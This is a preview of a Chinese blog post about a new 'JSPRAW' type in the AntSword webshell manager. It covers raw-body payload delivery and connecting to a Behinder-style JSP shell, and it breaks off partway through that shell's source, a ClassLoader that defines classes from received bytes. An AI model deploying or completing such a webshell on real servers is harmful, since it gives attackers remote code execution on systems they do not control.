AntSword新增类型：JSPRAW的一些玩法

文章预览

背景 最近给AntSword新增了一种类型：JSPRAW，主要有以下两点改进： JSPRAW不再使用其他参数进行传参，同时支持key-value键值对以及raw传参形式 新增toString触发方式，Payload可以不用依赖外部request/response对象，兼容非HTTP场景 接下来以几个实际场景讲讲这个新类型有哪些应用。 具体应用 一键连接冰蝎的JSP Shell JSPRAW支持如下Shell写法，类似冰蝎，直接发送RAW格式的Payload。 需要注意的是这时候设置密码是不生效的，随便填即可，另外需要在设置里勾选 其他设置-Body设置为RAW模式。如果不勾选的话就是键值对传参形式，可以兼容原来的Shell写法。 class U extends ClassLoader { U ( ClassLoader c ) { super ( c ); } public Class g ( byte [] b ) { return super . defineClass ( b , 0 , b . length ); } } public byte [] base64Decode ( S ………………………………